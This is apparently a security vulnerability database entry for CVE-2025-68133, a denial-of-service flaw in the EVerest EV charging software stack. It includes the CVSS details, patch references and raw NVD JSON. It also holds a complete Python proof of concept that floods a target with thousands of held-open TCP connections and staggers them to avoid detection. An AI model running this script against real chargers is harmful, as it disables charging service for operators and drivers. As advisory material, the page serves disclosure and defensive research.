Security Vulnerability Report
中文
CVE-2025-68133 CVSS 7.4 HIGH

CVE-2025-68133

Published: 2026-01-21 03:15:46
Last Modified: 2026-02-06 21:21:37
Source: [email protected]

Description

EVerest is an EV charging software stack. In versions 2025.9.0 and below, an attacker can exhaust the operating system's memory and cause the module to terminate by initiating an unlimited number of TCP connections that never proceed to ISO 15118-2 communication. This is possible because a new thread is started for each incoming plain TCP or TLS socket connection before any verification occurs, and the verification performed is too permissive. The EVerest processes and all its modules shut down, affecting all EVSE functionality. This issue is fixed in version 2025.10.0.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:* - VULNERABLE
EVerest everest-core <= 2025.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-68133 PoC - EVerest TCP Connection Exhaustion This PoC demonstrates the resource exhaustion vulnerability in EVerest by creating multiple TCP connections that never complete TLS handshake. """ import socket import threading import time import sys def create_tcp_connection(target_host, target_port, connection_id): """Create a TCP connection and keep it open""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) # Send incomplete TLS ClientHello or nothing # Connection will stay open consuming resources print(f"[Connection {connection_id}] Established") # Keep connection alive while True: time.sleep(60) except Exception as e: print(f"[Connection {connection_id}] Failed: {e}") def attack(target_host, target_port, num_connections): """Launch the DoS attack by creating multiple connections""" print(f"[*] Starting attack on {target_host}:{target_port}") print(f"[*] Creating {num_connections} connections...") threads = [] for i in range(num_connections): t = threading.Thread( target=create_tcp_connection, args=(target_host, target_port, i+1) ) t.daemon = True t.start() threads.append(t) # Stagger connections slightly to avoid immediate detection if i % 100 == 0: time.sleep(0.1) print(f"[*] {num_connections} connections established") print(f"[*] Attack in progress... Press Ctrl+C to stop") try: while True: time.sleep(1) except KeyboardInterrupt: print("\n[*] Stopping attack...") if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-68133-poc.py <target_host> <port> <num_connections>") print("Example: python cve-2025-68133-poc.py 192.168.1.100 8849 10000") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) connections = int(sys.argv[3]) attack(target, port, connections)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68133", "sourceIdentifier": "[email protected]", "published": "2026-01-21T03:15:45.513", "lastModified": "2026-02-06T21:21:36.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EVerest is an EV charging software stack. In versions 2025.9.0 and below, an attacker can exhaust the operating system's memory and cause the module to terminate by initiating an unlimited number of TCP connections that never proceed to ISO 15118-2 communication. This is possible because a new thread is started for each incoming plain TCP or TLS socket connection before any verification occurs, and the verification performed is too permissive. The EVerest processes and all its modules shut down, affecting all EVSE functionality. This issue is fixed in version 2025.10.0."}, {"lang": "es", "value": "EVerest es una pila de software de carga de VE. En las versiones 2025.9.0 e inferiores, un atacante puede agotar la memoria del sistema operativo y provocar la terminación del módulo al iniciar un número ilimitado de conexiones TCP que nunca avanzan a la comunicación ISO 15118-2. Esto es posible porque se inicia un nuevo hilo para cada conexión de socket TCP o TLS entrante antes de que se realice cualquier verificación, y la verificación realizada es demasiado permisiva. Los procesos de EVerest y todos sus módulos se cierran, afectando toda la funcionalidad del EVSE. Este problema se ha corregido en la versión 2025.10.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.10.0", "matchCriteriaId": "94E1768A-FED9-477E-A4B7-99FD10058D23"}]}]}], "references": [{"url": "https://github.com/EVerest/everest-core/commit/8127b8c54b296c4dd01b356ac26763f81f76a8fd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/EVerest/everest-core/commit/de504f0c11069010d26767b0952739e9a400cef3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/EVerest/everest-core/security/advisories/GHSA-mv3w-pp85-5h7c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.